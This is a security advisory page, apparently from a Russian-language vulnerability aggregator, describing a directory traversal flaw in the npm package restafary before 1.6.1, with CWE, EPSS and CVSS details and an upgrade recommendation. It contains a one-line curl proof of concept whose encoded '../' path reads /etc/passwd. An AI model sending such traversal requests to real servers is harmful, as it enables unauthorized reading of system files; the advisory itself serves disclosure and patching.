Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-xg5r-8j97-2wrj

Опубликовано: 18 фев. 2019
Источник: github
Github: Прошло ревью

Описание

Directory Traversal in restafary

Affected versions of restafary are susceptible to a directory traversal vulnerability when a root path is specified in the configuration.

Proof of Concept

curl -i -s -k -X 'GET' -H 'Authorization: Basic YWRtaW46cGFzc3dvcmQ=' 'http://localhost:8000/api/v1/fs/..%2f..%2fetc/passwd'

Recommendation

Update to version 1.6.1 or later.

Пакеты

Наименование

restafary

npm
Затронутые версииВерсия исправления

< 1.6.1

1.6.1

EPSS

Процентиль: 60%
0.00393
Низкий

Дефекты

CWE-22

Связанные уязвимости

CVSS3: 4.9
nvd
больше 7 лет назад

restafary is a REpresentful State Transfer API for Creating, Reading, Using, Deleting files on a server from the web. Restafary before 1.6.1 is able to set up a root path, which should only allow it to run inside of that root path it specified.

EPSS

Процентиль: 60%
0.00393
Низкий

Дефекты

CWE-22